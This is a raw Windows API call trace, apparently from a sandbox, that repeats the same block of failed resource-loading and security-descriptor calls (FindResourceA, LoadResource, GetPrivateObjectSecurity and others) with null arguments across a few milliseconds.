[0220.029] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.029] LockResource (hResData=0x0) returned 0x0 [0220.029] FreeResource (hResData=0x0) returned 0 [0220.029] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.030] LockResource (hResData=0x0) returned 0x0 [0220.030] FreeResource (hResData=0x0) returned 0 [0220.030] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.030] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.030] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.030] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.030] LockResource (hResData=0x0) returned 0x0 [0220.030] FreeResource (hResData=0x0) returned 0 [0220.030] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.030] LockResource (hResData=0x0) returned 0x0 [0220.030] FreeResource (hResData=0x0) returned 0 [0220.030] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.030] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.030] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.030] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.030] LockResource (hResData=0x0) returned 0x0 [0220.030] FreeResource (hResData=0x0) returned 0 [0220.030] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.030] LockResource (hResData=0x0) returned 0x0 [0220.030] FreeResource (hResData=0x0) returned 0 [0220.030] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.030] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.030] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.030] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.030] LockResource (hResData=0x0) returned 0x0 [0220.030] FreeResource (hResData=0x0) returned 0 [0220.030] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.030] LockResource (hResData=0x0) returned 0x0 [0220.030] FreeResource (hResData=0x0) returned 0 [0220.030] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.030] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.031] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.031] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.031] LockResource (hResData=0x0) returned 0x0 [0220.031] FreeResource (hResData=0x0) returned 0 [0220.031] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.031] LockResource (hResData=0x0) returned 0x0 [0220.031] FreeResource (hResData=0x0) returned 0 [0220.031] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.031] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.031] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.031] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.031] LockResource (hResData=0x0) returned 0x0 [0220.031] FreeResource (hResData=0x0) returned 0 [0220.031] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.031] LockResource (hResData=0x0) returned 0x0 [0220.031] FreeResource (hResData=0x0) returned 0 [0220.031] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.031] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.031] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.031] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.031] LockResource (hResData=0x0) returned 0x0 [0220.031] FreeResource (hResData=0x0) returned 0 [0220.031] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.031] LockResource (hResData=0x0) returned 0x0 [0220.031] FreeResource (hResData=0x0) returned 0 [0220.031] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.031] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.031] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.031] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.031] LockResource (hResData=0x0) returned 0x0 [0220.032] FreeResource (hResData=0x0) returned 0 [0220.032] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.032] LockResource (hResData=0x0) returned 0x0 [0220.032] FreeResource (hResData=0x0) returned 0 [0220.032] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.032] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.032] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.032] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.032] LockResource (hResData=0x0) returned 0x0 [0220.032] FreeResource (hResData=0x0) returned 0 [0220.032] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.032] LockResource (hResData=0x0) returned 0x0 [0220.032] FreeResource (hResData=0x0) returned 0 [0220.032] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.032] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.032] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.032] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.032] LockResource (hResData=0x0) returned 0x0 [0220.032] FreeResource (hResData=0x0) returned 0 [0220.032] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.032] LockResource (hResData=0x0) returned 0x0 [0220.032] FreeResource (hResData=0x0) returned 0 [0220.032] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.032] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.032] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.032] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.032] LockResource (hResData=0x0) returned 0x0 [0220.032] FreeResource (hResData=0x0) returned 0 [0220.032] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.032] LockResource (hResData=0x0) returned 0x0 [0220.032] FreeResource (hResData=0x0) returned 0 [0220.033] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.033] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.033] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.033] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.033] LockResource (hResData=0x0) returned 0x0 [0220.033] FreeResource (hResData=0x0) returned 0 [0220.033] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.033] LockResource (hResData=0x0) returned 0x0 [0220.033] FreeResource (hResData=0x0) returned 0 [0220.033] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.033] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.033] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.033] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.033] LockResource (hResData=0x0) returned 0x0 [0220.033] FreeResource (hResData=0x0) returned 0 [0220.033] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.033] LockResource (hResData=0x0) returned 0x0 [0220.033] FreeResource (hResData=0x0) returned 0 [0220.033] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.033] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.033] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.033] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.033] LockResource (hResData=0x0) returned 0x0 [0220.033] FreeResource (hResData=0x0) returned 0 [0220.033] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.033] LockResource (hResData=0x0) returned 0x0 [0220.033] FreeResource (hResData=0x0) returned 0 [0220.033] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.033] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.033] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.033] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.034] LockResource (hResData=0x0) returned 0x0 [0220.034] FreeResource (hResData=0x0) returned 0 [0220.034] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.034] LockResource (hResData=0x0) returned 0x0 [0220.034] FreeResource (hResData=0x0) returned 0 [0220.034] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.034] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.034] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.034] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.034] LockResource (hResData=0x0) returned 0x0 [0220.034] FreeResource (hResData=0x0) returned 0 [0220.034] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.034] LockResource (hResData=0x0) returned 0x0 [0220.034] FreeResource (hResData=0x0) returned 0 [0220.034] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.034] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.034] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.034] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.034] LockResource (hResData=0x0) returned 0x0 [0220.034] FreeResource (hResData=0x0) returned 0 [0220.034] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.034] LockResource (hResData=0x0) returned 0x0 [0220.034] FreeResource (hResData=0x0) returned 0 [0220.034] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.034] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.034] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.034] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.034] LockResource (hResData=0x0) returned 0x0 [0220.034] FreeResource (hResData=0x0) returned 0 [0220.034] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.034] LockResource (hResData=0x0) returned 0x0 [0220.035] FreeResource (hResData=0x0) returned 0 [0220.035] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.035] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.035] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.035] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.035] LockResource (hResData=0x0) returned 0x0 [0220.035] FreeResource (hResData=0x0) returned 0 [0220.035] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.035] LockResource (hResData=0x0) returned 0x0 [0220.035] FreeResource (hResData=0x0) returned 0 [0220.035] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.035] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.035] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.035] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.035] LockResource (hResData=0x0) returned 0x0 [0220.035] FreeResource (hResData=0x0) returned 0 [0220.035] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.035] LockResource (hResData=0x0) returned 0x0 [0220.035] FreeResource (hResData=0x0) returned 0 [0220.035] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.035] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.035] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.035] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.035] LockResource (hResData=0x0) returned 0x0 [0220.035] FreeResource (hResData=0x0) returned 0 [0220.035] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.035] LockResource (hResData=0x0) returned 0x0 [0220.035] FreeResource (hResData=0x0) returned 0 [0220.035] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.035] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.035] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.036] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.036] LockResource (hResData=0x0) returned 0x0 [0220.036] FreeResource (hResData=0x0) returned 0 [0220.036] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.036] LockResource (hResData=0x0) returned 0x0 [0220.036] FreeResource (hResData=0x0) returned 0 [0220.036] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.036] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.036] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.036] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.036] LockResource (hResData=0x0) returned 0x0 [0220.036] FreeResource (hResData=0x0) returned 0 [0220.036] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.036] LockResource (hResData=0x0) returned 0x0 [0220.036] FreeResource (hResData=0x0) returned 0 [0220.036] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.036] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.036] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.036] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.036] LockResource (hResData=0x0) returned 0x0 [0220.036] FreeResource (hResData=0x0) returned 0 [0220.036] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.037] LockResource (hResData=0x0) returned 0x0 [0220.037] FreeResource (hResData=0x0) returned 0 [0220.037] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.037] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.037] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.037] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.037] LockResource (hResData=0x0) returned 0x0 [0220.037] FreeResource (hResData=0x0) returned 0 [0220.037] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.037] LockResource (hResData=0x0) returned 0x0 [0220.037] FreeResource (hResData=0x0) returned 0 [0220.037] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.037] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.037] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.037] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.037] LockResource (hResData=0x0) returned 0x0 [0220.037] FreeResource (hResData=0x0) returned 0 [0220.037] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.037] LockResource (hResData=0x0) returned 0x0 [0220.037] FreeResource (hResData=0x0) returned 0 [0220.037] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.037] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.037] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.037] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.037] LockResource (hResData=0x0) returned 0x0 [0220.037] FreeResource (hResData=0x0) 